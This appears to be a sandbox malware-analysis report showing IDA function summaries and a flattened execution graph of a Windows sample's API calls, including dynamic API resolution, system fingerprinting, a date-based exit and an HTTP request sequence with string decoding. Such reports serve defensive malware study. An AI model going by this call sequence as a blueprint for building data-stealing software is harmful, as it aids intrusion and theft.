                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                    • String ID: pThreadProxy
                                                    • API String ID: 1687795959-3651400591
                                                    • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                    • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                    • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                    • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                    • GetLastError.KERNEL32 ref: 0042AF2E
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                    • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                    • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024F2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024F2AAD,00000000), ref: 0251B187
                                                    • GetLastError.KERNEL32 ref: 0251B195
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,024F2AAD,00000000), ref: 0251B1F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                    • Instruction ID: 69d67923db2fe85f3cbaf061169db830ccda95cdadbe5d0c4f3a0f7bf2948c14
                                                    • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                    • Instruction Fuzzy Hash: 43410731604206AFEF259F65CC44BBE7FA5FF41718F254169EC69971A0DB30CA05CB68

                                                    Execution Graph

                                                    Execution Coverage: 4.8%
                                                    Dynamic/Decrypted Code Coverage: 7.8%
                                                    Signature Coverage: 9.5%
                                                    Total number of Nodes: 1372
                                                    Total number of Limit Nodes: 35
33940 4029c7 33939->33940 33941 404980 34 API calls 33940->33941 33942 4029dd 33941->33942 33943 404980 34 API calls 33942->33943 33944 4029f3 33943->33944 33945 404980 34 API calls 33944->33945 33946 402a09 33945->33946 33947 404980 34 API calls 33946->33947 33948 402a1f 33947->33948 33949 404980 34 API calls 33948->33949 33950 402a38 33949->33950 33951 404980 34 API calls 33950->33951 33952 402a4e 33951->33952 33953 404980 34 API calls 33952->33953 33954 402a64 33953->33954 33955 404980 34 API calls 33954->33955 33956 402a7a 33955->33956 33957 404980 34 API calls 33956->33957 33958 402a90 33957->33958 33959 404980 34 API calls 33958->33959 33960 402aa6 33959->33960 33961 404980 34 API calls 33960->33961 33962 402abf 33961->33962 33963 404980 34 API calls 33962->33963 33964 402ad5 33963->33964 33965 404980 34 API calls 33964->33965 33966 402aeb 33965->33966 33967 404980 34 API calls 33966->33967 33968 402b01 33967->33968 33969 404980 34 API calls 33968->33969 33970 402b17 33969->33970 33971 404980 34 API calls 33970->33971 33972 402b2d 33971->33972 33973 404980 34 API calls 33972->33973 33974 402b46 33973->33974 33975 404980 34 API calls 33974->33975 33976 402b5c 33975->33976 33977 404980 34 API calls 33976->33977 33978 402b72 33977->33978 33979 404980 34 API calls 33978->33979 33980 402b88 33979->33980 33981 404980 34 API calls 33980->33981 33982 402b9e 33981->33982 33983 404980 34 API calls 33982->33983 33984 402bb4 33983->33984 33985 404980 34 API calls 33984->33985 33986 402bcd 33985->33986 33987 404980 34 API calls 33986->33987 33988 402be3 33987->33988 33989 404980 34 API calls 33988->33989 33990 402bf9 33989->33990 33991 404980 34 API calls 33990->33991 33992 402c0f 33991->33992 33993 404980 34 API calls 33992->33993 33994 402c25 33993->33994 33995 404980 34 API calls 33994->33995 33996 402c3b 33995->33996 33997 404980 34 API calls 33996->33997 33998 402c54 33997->33998 33999 404980 34 API calls 33998->33999 34000 402c6a 33999->34000 34001 404980 34 API 
calls 34000->34001 34002 402c80 34001->34002 34003 404980 34 API calls 34002->34003 34004 402c96 34003->34004 34005 404980 34 API calls 34004->34005 34006 402cac 34005->34006 34007 404980 34 API calls 34006->34007 34008 402cc2 34007->34008 34009 404980 34 API calls 34008->34009 34010 402cdb 34009->34010 34011 404980 34 API calls 34010->34011 34012 402cf1 34011->34012 34013 404980 34 API calls 34012->34013 34014 402d07 34013->34014 34015 404980 34 API calls 34014->34015 34016 402d1d 34015->34016 34017 404980 34 API calls 34016->34017 34018 402d33 34017->34018 34019 404980 34 API calls 34018->34019 34020 402d49 34019->34020 34021 404980 34 API calls 34020->34021 34022 402d62 34021->34022 34023 4263c0 GetPEB 34022->34023 34024 4265f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 34023->34024 34025 4263f3 34023->34025 34026 426655 GetProcAddress 34024->34026 34027 426668 34024->34027 34032 426407 20 API calls 34025->34032 34026->34027 34028 426671 GetProcAddress GetProcAddress 34027->34028 34029 42669c 34027->34029 34028->34029 34030 4266a5 GetProcAddress 34029->34030 34031 4266b8 34029->34031 34030->34031 34033 4266c1 GetProcAddress 34031->34033 34034 4266d4 34031->34034 34032->34024 34033->34034 34035 426707 34034->34035 34036 4266dd GetProcAddress GetProcAddress 34034->34036 34035->33915 34036->34035 34038 422ac4 34037->34038 34038->33919 34039->33930 34048 421800 25 API calls 34040->34048 34042 421b61 sscanf 34049 402930 34042->34049 34045 421bc9 34045->33935 34046 421bc2 ExitProcess 34047 421bb6 34047->34045 34047->34046 34048->34042 34050 402934 SystemTimeToFileTime SystemTimeToFileTime 34049->34050 34050->34045 34050->34047 34172 249e3d0 140 API calls 34072 92a00e 34073 92a011 34072->34073 34076 92a91e 34073->34076 34077 92a92d 34076->34077 34080 92b0be 34077->34080 34081 92b0d9 34080->34081 34082 92b0e2 CreateToolhelp32Snapshot 34081->34082 34083 92b0fe Module32First 34081->34083 34082->34081 34082->34083 34084 92a91d 34083->34084 34085 
92b10d 34083->34085 34087 92ad7d 34085->34087 34088 92ada8 34087->34088 34089 92adf1 34088->34089 34090 92adb9 VirtualAlloc 34088->34090 34089->34089 34090->34089 34119 24a2ed7 GetUserDefaultLocaleName LocalAlloc CharToOemW 34256 4023e0 116 API calls 34120 4180e0 7 API calls 33874 4226e0 GetWindowsDirectoryA 33875 422725 33874->33875 33876 42272c GetVolumeInformationA 33874->33876 33875->33876 33877 42278c GetProcessHeap HeapAlloc 33876->33877 33879 4227c6 wsprintfA 33877->33879 33880 4227c2 33877->33880 33879->33880 33883 427210 lstrcpy 33880->33883 33882 422800 33883->33882 34257 423fe0 GetFileAttributesA 34218 2481ccb 156 API calls 34122 40bce9 90 API calls 34220 24a0ce7 612 API calls 34259 408ff0 21 API calls 34123 24a0af0 1732 API calls 34178 24a33f7 GetSystemInfo wsprintfA 33362 404b80 33363 404ba0 33362->33363 33364 404bb5 33363->33364 33365 404bad lstrcpy 33363->33365 33516 404ae0 33364->33516 33365->33364 33367 404bc0 33368 404bfc lstrcpy 33367->33368 33369 404c08 33367->33369 33368->33369 33370 404c2f lstrcpy 33369->33370 33371 404c3b 33369->33371 33370->33371 33372 404c5f lstrcpy 33371->33372 33373 404c6b 33371->33373 33372->33373 33374 404c9d lstrcpy 33373->33374 33375 404ca9 33373->33375 33374->33375 33376 404cd0 lstrcpy 33375->33376 33377 404cdc InternetOpenA StrCmpCA 33375->33377 33376->33377 33378 404d10 33377->33378 33379 4053e8 InternetCloseHandle CryptStringToBinaryA 33378->33379 33380 404d1f 33378->33380 33381 405418 LocalAlloc 33379->33381 33398 405508 33379->33398 33520 423e10 lstrcpy lstrcpy GetSystemTime 33380->33520 33383 40542f CryptStringToBinaryA 33381->33383 33381->33398 33384 405447 LocalFree 33383->33384 33385 405459 lstrlenA 33383->33385 33384->33398 33386 40546d 33385->33386 33388 405493 lstrlenA 33386->33388 33389 405487 lstrcpy 33386->33389 33387 404d2a 33390 404d53 lstrcpy lstrcatA 33387->33390 33391 404d68 33387->33391 33393 4054ad 33388->33393 33389->33388 33390->33391 33392 404d8a lstrcpy 33391->33392 33395 404d92 33391->33395 
33392->33395 33394 4054bf lstrcpy lstrcatA 33393->33394 33396 4054d2 33393->33396 33394->33396 33397 404da1 lstrlenA 33395->33397 33400 405501 33396->33400 33401 4054f9 lstrcpy 33396->33401 33399 404db9 33397->33399 33402 404dc5 lstrcpy lstrcatA 33399->33402 33403 404ddc 33399->33403 33400->33398 33401->33400 33402->33403 33404 404e05 33403->33404 33405 404dfd lstrcpy 33403->33405 33406 404e0c lstrlenA 33404->33406 33405->33404 33407 404e22 33406->33407 33408 404e2e lstrcpy lstrcatA 33407->33408 33409 404e45 33407->33409 33408->33409 33410 404e66 lstrcpy 33409->33410 33411 404e6e 33409->33411 33410->33411 33412 404e95 lstrcpy lstrcatA 33411->33412 33413 404eab 33411->33413 33412->33413 33414 404ed4 33413->33414 33415 404ecc lstrcpy 33413->33415 33416 404edb lstrlenA 33414->33416 33415->33414 33417 404ef1 33416->33417 33418 404efd lstrcpy lstrcatA 33417->33418 33419 404f14 33417->33419 33418->33419 33420 404f3d 33419->33420 33421 404f35 lstrcpy 33419->33421 33422 404f44 lstrlenA 33420->33422 33421->33420 33423 404f5a 33422->33423 33424 404f66 lstrcpy lstrcatA 33423->33424 33425 404f7d 33423->33425 33424->33425 33426 404fa9 33425->33426 33427 404fa1 lstrcpy 33425->33427 33428 404fb0 lstrlenA 33426->33428 33427->33426 33429 404fcb 33428->33429 33430 404fdc lstrcpy lstrcatA 33429->33430 33431 404fec 33429->33431 33430->33431 33432 40500a lstrcpy lstrcatA 33431->33432 33433 40501d 33431->33433 33432->33433 33434 40503b lstrcpy 33433->33434 33435 405043 33433->33435 33434->33435 33436 405051 InternetConnectA 33435->33436 33436->33379 33437 405080 HttpOpenRequestA 33436->33437 33438 4053e1 InternetCloseHandle 33437->33438 33439 4050bb 33437->33439 33438->33379 33521 427340 lstrlenA lstrcpy lstrcatA 33439->33521 33441 4050cb 33522 4272b0 lstrcpy 33441->33522 33443 4050d4 33523 4272f0 lstrcpy lstrcatA 33443->33523 33445 4050e7 33524 4272b0 lstrcpy 33445->33524 33447 4050f0 33525 427340 lstrlenA lstrcpy lstrcatA 33447->33525 33449 405105 33526 4272b0 lstrcpy 33449->33526 
33451 40510e 33527 427340 lstrlenA lstrcpy lstrcatA 33451->33527 33453 405124 33528 4272b0 lstrcpy 33453->33528 33455 40512d 33529 427340 lstrlenA lstrcpy lstrcatA 33455->33529 33457 405143 33530 4272b0 lstrcpy 33457->33530 33459 40514c 33531 427340 lstrlenA lstrcpy lstrcatA 33459->33531 33461 405161 33532 4272b0 lstrcpy 33461->33532 33463 40516a 33533 4272f0 lstrcpy lstrcatA 33463->33533 33465 40517d 33534 4272b0 lstrcpy 33465->33534 33467 405186 33535 427340 lstrlenA lstrcpy lstrcatA 33467->33535 33469 40519b 33536 4272b0 lstrcpy 33469->33536 33471 4051a4 33537 427340 lstrlenA lstrcpy lstrcatA 33471->33537 33473 4051b9 33538 4272b0 lstrcpy 33473->33538 33475 4051c2 33539 4272f0 lstrcpy lstrcatA 33475->33539 33477 4051d5 33540 4272b0 lstrcpy 33477->33540 33479 4051de 33541 427340 lstrlenA lstrcpy lstrcatA 33479->33541 33481 4051f3 33542 4272b0 lstrcpy 33481->33542 33483 4051fc 33543 427340 lstrlenA lstrcpy lstrcatA 33483->33543 33485 405212 33544 4272b0 lstrcpy 33485->33544 33487 40521b 33545 427340 lstrlenA lstrcpy lstrcatA 33487->33545 33489 405231 33546 4272b0 lstrcpy 33489->33546 33491 40523a 33547 427340 lstrlenA lstrcpy lstrcatA 33491->33547 33493 40524f 33548 4272b0 lstrcpy 33493->33548 33495 405258 33549 4272f0 lstrcpy lstrcatA 33495->33549 33497 40526b 33550 4272b0 lstrcpy 33497->33550 33499 405274 33500 4052a0 lstrcpy 33499->33500 33501 4052ac 33499->33501 33500->33501 33551 4272f0 lstrcpy lstrcatA 33501->33551 33503 4052ba 33552 4272f0 lstrcpy lstrcatA 33503->33552 33505 4052c7 33553 4272b0 lstrcpy 33505->33553 33507 4052d1 33508 4052e1 lstrlenA lstrlenA HttpSendRequestA InternetReadFile 33507->33508 33509 4053cc InternetCloseHandle 33508->33509 33513 405322 33508->33513 33511 4053de 33509->33511 33510 40532d lstrlenA 33510->33513 33511->33438 33512 40535e lstrcpy lstrcatA 33512->33513 33513->33509 33513->33510 33513->33512 33514 40539b lstrcpy 33513->33514 33515 4053aa InternetReadFile 33513->33515 33514->33513 33515->33509 33515->33513 33517 404af0 
33516->33517 33517->33517 33518 404af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlenA InternetCrackUrlA 33517->33518 33519 404b61 33518->33519 33519->33367 33520->33387 33521->33441 33522->33443 33523->33445 33524->33447 33525->33449 33526->33451 33527->33453 33528->33455 33529->33457 33530->33459 33531->33461 33532->33463 33533->33465 33534->33467 33535->33469 33536->33471 33537->33473 33538->33475 33539->33477 33540->33479 33541->33481 33542->33483 33543->33485 33544->33487 33545->33489 33546->33491 33547->33493 33548->33495 33549->33497 33550->33499 33551->33503 33552->33505 33553->33507 34222 425a80 11 API calls 34223 24a0c88 614 API calls 34224 249e480 133 API calls 34124 24979aa 1167 API calls 34125 24a2a87 10 API calls 34126 24a3687 6 API calls 34227 24a3487 7 API calls 34127 24981fc strtok_s StrCmpCA 32725 402d90 33358 404980 17 API calls 32725->33358 32727 402da2 32728 404980 34 API calls 32727->32728 32729 402dc0 32728->32729 32730 404980 34 API calls 32729->32730 32731 402dd6 32730->32731 32732 404980 34 API calls 32731->32732 32733 402deb 32732->32733 32734 404980 34 API calls 32733->32734 32735 402e0c 32734->32735 32736 404980 34 API calls 32735->32736 32737 402e21 32736->32737 32738 404980 34 API calls 32737->32738 32739 402e39 32738->32739 32740 404980 34 API calls 32739->32740 32741 402e5a 32740->32741 32742 404980 34 API calls 32741->32742 32743 402e6f 32742->32743 32744 404980 34 API calls 32743->32744 32745 402e85 32744->32745 32746 404980 34 API calls 32745->32746 32747 402e9b 32746->32747 32748 404980 34 API calls 32747->32748 32749 402eb1 32748->32749 32750 404980 34 API calls 32749->32750 32751 402eca 32750->32751 32752 404980 34 API calls 32751->32752 32753 402ee0 32752->32753 32754 404980 34 API calls 32753->32754 32755 402ef6 32754->32755 32756 404980 34 API calls 32755->32756 32757 402f0c 32756->32757 32758 404980 34 API calls 32757->32758 32759 402f22 32758->32759 32760 404980 34 API calls 32759->32760 32761 402f38 32760->32761 32762 404980 
34 API calls 32761->32762 32763 402f51 32762->32763 32764 404980 34 API calls 32763->32764 32765 402f67 32764->32765 32766 404980 34 API calls 32765->32766 32767 402f7d 32766->32767 32768 404980 34 API calls 32767->32768 32769 402f93 32768->32769 32770 404980 34 API calls 32769->32770 32771 402fa9 32770->32771 32772 404980 34 API calls 32771->32772 32773 402fbf 32772->32773 32774 404980 34 API calls 32773->32774 32775 402fd8 32774->32775 32776 404980 34 API calls 32775->32776 32777 402fee 32776->32777 32778 404980 34 API calls 32777->32778 32779 403004 32778->32779 32780 404980 34 API calls 32779->32780 32781 40301a 32780->32781 32782 404980 34 API calls 32781->32782 32783 403030 32782->32783 32784 404980 34 API calls 32783->32784 32785 403046 32784->32785 32786 404980 34 API calls 32785->32786 32787 40305f 32786->32787 32788 404980 34 API calls 32787->32788 32789 403075 32788->32789 32790 404980 34 API calls 32789->32790 32791 40308b 32790->32791 32792 404980 34 API calls 32791->32792 32793 4030a1 32792->32793 32794 404980 34 API calls 32793->32794 32795 4030b7 32794->32795 32796 404980 34 API calls 32795->32796 32797 4030cd 32796->32797 32798 404980 34 API calls 32797->32798 32799 4030e6 32798->32799 32800 404980 34 API calls 32799->32800 32801 4030fc 32800->32801 32802 404980 34 API calls 32801->32802 32803 403112 32802->32803 32804 404980 34 API calls 32803->32804 32805 403128 32804->32805 32806 404980 34 API calls 32805->32806 32807 40313e 32806->32807 32808 404980 34 API calls 32807->32808 32809 403154 32808->32809 32810 404980 34 API calls 32809->32810 32811 40316d 32810->32811 32812 404980 34 API calls 32811->32812 32813 403183 32812->32813 32814 404980 34 API calls 32813->32814 32815 403199 32814->32815 32816 404980 34 API calls 32815->32816 32817 4031af 32816->32817 32818 404980 34 API calls 32817->32818 32819 4031c5 32818->32819 32820 404980 34 API calls 32819->32820 32821 4031db 32820->32821 32822 404980 34 API calls 32821->32822 32823 4031f4 
32822->32823 32824 404980 34 API calls 32823->32824 32825 40320a 32824->32825 32826 404980 34 API calls 32825->32826 32827 403220 32826->32827 32828 404980 34 API calls 32827->32828 32829 403236 32828->32829 32830 404980 34 API calls 32829->32830 32831 40324c 32830->32831 32832 404980 34 API calls 32831->32832 32833 403262 32832->32833 32834 404980 34 API calls 32833->32834 32835 40327b 32834->32835 32836 404980 34 API calls 32835->32836 32837 403291 32836->32837 32838 404980 34 API calls 32837->32838 32839 4032a7 32838->32839 32840 404980 34 API calls 32839->32840 32841 4032bd 32840->32841 32842 404980 34 API calls 32841->32842 32843 4032d3 32842->32843 32844 404980 34 API calls 32843->32844 32845 4032e9 32844->32845 32846 404980 34 API calls 32845->32846 32847 403302 32846->32847 32848 404980 34 API calls 32847->32848 32849 403318 32848->32849 32850 404980 34 API calls 32849->32850 32851 40332e 32850->32851 32852 404980 34 API calls 32851->32852 32853 403344 32852->32853 32854 404980 34 API calls 32853->32854 32855 40335a 32854->32855 32856 404980 34 API calls 32855->32856 32857 403370 32856->32857 32858 404980 34 API calls 32857->32858 32859 403389 32858->32859 32860 404980 34 API calls 32859->32860 32861 40339f 32860->32861 32862 404980 34 API calls 32861->32862 32863 4033b5 32862->32863 32864 404980 34 API calls 32863->32864 32865 4033cb 32864->32865 32866 404980 34 API calls 32865->32866 32867 4033e1 32866->32867 32868 404980 34 API calls 32867->32868 32869 4033f7 32868->32869 32870 404980 34 API calls 32869->32870 32871 403410 32870->32871 32872 404980 34 API calls 32871->32872 32873 403426 32872->32873 32874 404980 34 API calls 32873->32874 32875 40343c 32874->32875 32876 404980 34 API calls 32875->32876 32877 403452 32876->32877 32878 404980 34 API calls 32877->32878 32879 403468 32878->32879 32880 404980 34 API calls 32879->32880 32881 40347e 32880->32881 32882 404980 34 API calls 32881->32882 32883 403497 32882->32883 32884 404980 34 API calls 
32883->32884 32885 4034ad 32884->32885 32886 404980 34 API calls 32885->32886 32887 4034c3 32886->32887 32888 404980 34 API calls 32887->32888 32889 4034d9 32888->32889 32890 404980 34 API calls 32889->32890 32891 4034ef 32890->32891 32892 404980 34 API calls 32891->32892 32893 403505 32892->32893 32894 404980 34 API calls 32893->32894 32895 40351e 32894->32895 32896 404980 34 API calls 32895->32896 32897 403534 32896->32897 32898 404980 34 API calls 32897->32898 32899 40354a 32898->32899 32900 404980 34 API calls 32899->32900 32901 403560 32900->32901 32902 404980 34 API calls 32901->32902 32903 403576 32902->32903 32904 404980 34 API calls 32903->32904 32905 40358c 32904->32905 32906 404980 34 API calls 32905->32906 32907 4035a5 32906->32907 32908 404980 34 API calls 32907->32908 32909 4035bb 32908->32909 32910 404980 34 API calls 32909->32910 32911 4035d1 32910->32911 32912 404980 34 API calls 32911->32912 32913 4035e7 32912->32913 32914 404980 34 API calls 32913->32914 32915 4035fd 32914->32915 32916 404980 34 API calls 32915->32916 32917 403613 32916->32917 32918 404980 34 API calls 32917->32918 32919 40362c 32918->32919 32920 404980 34 API calls 32919->32920 32921 403642 32920->32921 32922 404980 34 API calls 32921->32922 32923 403658 32922->32923 32924 404980 34 API calls 32923->32924 32925 40366e 32924->32925 32926 404980 34 API calls 32925->32926 32927 403684 32926->32927 32928 404980 34 API calls 32927->32928 32929 40369a 32928->32929 32930 404980 34 API calls 32929->32930 32931 4036b3 32930->32931 32932 404980 34 API calls 32931->32932 32933 4036c9 32932->32933 32934 404980 34 API calls 32933->32934 32935 4036df 32934->32935 32936 404980 34 API calls 32935->32936 32937 4036f5 32936->32937 32938 404980 34 API calls 32937->32938 32939 40370b 32938->32939 32940 404980 34 API calls 32939->32940 32941 403721 32940->32941 32942 404980 34 API calls 32941->32942 32943 40373a 32942->32943 32944 404980 34 API calls 32943->32944 32945 403750 32944->32945 32946 
404980 34 API calls 32945->32946 32947 403766 32946->32947 32948 404980 34 API calls 32947->32948 32949 40377c 32948->32949 32950 404980 34 API calls 32949->32950 32951 403792 32950->32951 32952 404980 34 API calls 32951->32952 32953 4037a8 32952->32953 32954 404980 34 API calls 32953->32954 32955 4037c1 32954->32955 32956 404980 34 API calls 32955->32956 32957 4037d7 32956->32957 32958 404980 34 API calls 32957->32958 32959 4037ed 32958->32959 32960 404980 34 API calls 32959->32960 32961 403803 32960->32961 32962 404980 34 API calls 32961->32962 32963 403819 32962->32963 32964 404980 34 API calls 32963->32964 32965 40382f 32964->32965 32966 404980 34 API calls 32965->32966 32967 403848 32966->32967 32968 404980 34 API calls 32967->32968 32969 40385e 32968->32969 32970 404980 34 API calls 32969->32970 32971 403874 32970->32971 32972 404980 34 API calls 32971->32972 32973 40388a 32972->32973 32974 404980 34 API calls 32973->32974 32975 4038a0 32974->32975 32976 404980 34 API calls 32975->32976 32977 4038b6 32976->32977 32978 404980 34 API calls 32977->32978 32979 4038cf 32978->32979 32980 404980 34 API calls 32979->32980 32981 4038e5 32980->32981 32982 404980 34 API calls 32981->32982 32983 4038fb 32982->32983 32984 404980 34 API calls 32983->32984 32985 403911 32984->32985 32986 404980 34 API calls 32985->32986 32987 403927 32986->32987 32988 404980 34 API calls 32987->32988 32989 40393d 32988->32989 32990 404980 34 API calls 32989->32990 32991 403956 32990->32991 32992 404980 34 API calls 32991->32992 32993 40396c 32992->32993 32994 404980 34 API calls 32993->32994 32995 403982 32994->32995 32996 404980 34 API calls 32995->32996 32997 403998 32996->32997 32998 404980 34 API calls 32997->32998 32999 4039ae 32998->32999 33000 404980 34 API calls 32999->33000 33001 4039c4 33000->33001 33002 404980 34 API calls 33001->33002 33003 4039dd 33002->33003 33004 404980 34 API calls 33003->33004 33005 4039f3 33004->33005 33006 404980 34 API calls 33005->33006 33007 403a09 
33006->33007 33008 404980 34 API calls 33007->33008 33009 403a1f 33008->33009 33010 404980 34 API calls 33009->33010 33011 403a35 33010->33011 33012 404980 34 API calls 33011->33012 33013 403a4b 33012->33013 33014 404980 34 API calls 33013->33014 33015 403a64 33014->33015 33016 404980 34 API calls 33015->33016 33017 403a7a 33016->33017 33018 404980 34 API calls 33017->33018 33019 403a90 33018->33019 33020 404980 34 API calls 33019->33020 33021 403aa6 33020->33021 33022 404980 34 API calls 33021->33022 33023 403abc 33022->33023 33024 404980 34 API calls 33023->33024 33025 403ad2 33024->33025 33026 404980 34 API calls 33025->33026 33027 403aeb 33026->33027 33028 404980 34 API calls 33027->33028 33029 403b01 33028->33029 33030 404980 34 API calls 33029->33030 33031 403b17 33030->33031 33032 404980 34 API calls 33031->33032 33033 403b2d 33032->33033 33034 404980 34 API calls 33033->33034 33035 403b43 33034->33035 33036 404980 34 API calls 33035->33036 33037 403b59 33036->33037 33038 404980 34 API calls 33037->33038 33039 403b72 33038->33039 33040 404980 34 API calls 33039->33040 33041 403b88 33040->33041 33042 404980 34 API calls 33041->33042 33043 403b9e 33042->33043 33044 404980 34 API calls 33043->33044 33045 403bb4 33044->33045 33046 404980 34 API calls 33045->33046 33047 403bca 33046->33047 33048 404980 34 API calls 33047->33048 33049 403be0 33048->33049 33050 404980 34 API calls 33049->33050 33051 403bf9 33050->33051 33052 404980 34 API calls 33051->33052 33053 403c0f 33052->33053 33054 404980 34 API calls 33053->33054 33055 403c25 33054->33055 33056 404980 34 API calls 33055->33056 33057 403c3b 33056->33057 33058 404980 34 API calls 33057->33058 33059 403c51 33058->33059 33060 404980 34 API calls 33059->33060 33061 403c67 33060->33061 33062 404980 34 API calls 33061->33062 33063 403c80 33062->33063 33064 404980 34 API calls 33063->33064 33065 403c96 33064->33065 33066 404980 34 API calls 33065->33066 33067 403cac 33066->33067 33068 404980 34 API calls 
33067->33068 33069 403cc2 33068->33069 33070 404980 34 API calls 33069->33070 33071 403cd8 33070->33071 33072 404980 34 API calls 33071->33072 33073 403cee 33072->33073 33074 404980 34 API calls 33073->33074 33075 403d07 33074->33075 33076 404980 34 API calls 33075->33076 33077 403d1d 33076->33077 33078 404980 34 API calls 33077->33078 33079 403d33 33078->33079 33080 404980 34 API calls 33079->33080 33081 403d49 33080->33081 33082 404980 34 API calls 33081->33082 33083 403d5f 33082->33083 33084 404980 34 API calls 33083->33084 33085 403d75 33084->33085 33086 404980 34 API calls 33085->33086 33087 403d8e 33086->33087 33088 404980 34 API calls 33087->33088 33089 403da4 33088->33089 33090 404980 34 API calls 33089->33090 33091 403dba 33090->33091 33092 404980 34 API calls 33091->33092 33093 403dd0 33092->33093 33094 404980 34 API calls 33093->33094 33095 403de6 33094->33095 33096 404980 34 API calls 33095->33096 33097 403dfc 33096->33097 33098 404980 34 API calls 33097->33098 33099 403e15 33098->33099 33100 404980 34 API calls 33099->33100 33101 403e2b 33100->33101 33102 404980 34 API calls 33101->33102 33103 403e41 33102->33103 33104 404980 34 API calls 33103->33104 33105 403e57 33104->33105 33106 404980 34 API calls 33105->33106 33107 403e6d 33106->33107 33108 404980 34 API calls 33107->33108 33109 403e83 33108->33109 33110 404980 34 API calls 33109->33110 33111 403e9c 33110->33111 33112 404980 34 API calls 33111->33112 33113 403eb2 33112->33113 33114 404980 34 API calls 33113->33114 33115 403ec8 33114->33115 33116 404980 34 API calls 33115->33116 33117 403ede 33116->33117 33118 404980 34 API calls 33117->33118 33119 403ef4 33118->33119 33120 404980 34 API calls 33119->33120 33121 403f0a 33120->33121 33122 404980 34 API calls 33121->33122 33123 403f23 33122->33123 33124 404980 34 API calls 33123->33124 33125 403f39 33124->33125 33126 404980 34 API calls 33125->33126 33127 403f4f 33126->33127 33128 404980 34 API calls 33127->33128 33129 403f65 33128->33129 33130 
404980 34 API calls 33129->33130 33131 403f7b 33130->33131 33132 404980 34 API calls 33131->33132 33133 403f91 33132->33133 33134 404980 34 API calls 33133->33134 33135 403faa 33134->33135 33136 404980 34 API calls 33135->33136 33137 403fc0 33136->33137 33138 404980 34 API calls 33137->33138 33139 403fd6 33138->33139 33140 404980 34 API calls 33139->33140 33141 403fec 33140->33141 33142 404980 34 API calls 33141->33142 33143 404002 33142->33143 33144 404980 34 API calls 33143->33144 33145 404018 33144->33145 33146 404980 34 API calls 33145->33146 33147 404031 33146->33147 33148 404980 34 API calls 33147->33148 33149 404047 33148->33149 33150 404980 34 API calls 33149->33150 33151 40405d 33150->33151 33152 404980 34 API calls 33151->33152 33153 404073 33152->33153 33154 404980 34 API calls 33153->33154 33155 404089 33154->33155 33156 404980 34 API calls 33155->33156 33157 40409f 33156->33157 33158 404980 34 API calls 33157->33158 33159 4040b8 33158->33159 33160 404980 34 API calls 33159->33160 33161 4040ce 33160->33161 33162 404980 34 API calls 33161->33162 33163 4040e4 33162->33163 33164 404980 34 API calls 33163->33164 33165 4040fa 33164->33165 33166 404980 34 API calls 33165->33166 33167 404110 33166->33167 33168 404980 34 API calls 33167->33168 33169 404126 33168->33169 33170 404980 34 API calls 33169->33170 33171 40413f 33170->33171 33172 404980 34 API calls 33171->33172 33173 404155 33172->33173 33174 404980 34 API calls 33173->33174 33175 40416b 33174->33175 33176 404980 34 API calls 33175->33176 33177 404181 33176->33177 33178 404980 34 API calls 33177->33178 33179 404197 33178->33179 33180 404980 34 API calls 33179->33180 33181 4041ad 33180->33181 33182 404980 34 API calls 33181->33182 33183 4041c6 33182->33183 33184 404980 34 API calls 33183->33184 33185 4041dc 33184->33185 33186 404980 34 API calls 33185->33186 33187 4041f2 33186->33187 33188 404980 34 API calls 33187->33188 33189 404208 33188->33189 33190 404980 34 API calls 33189->33190 33191 40421e 
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
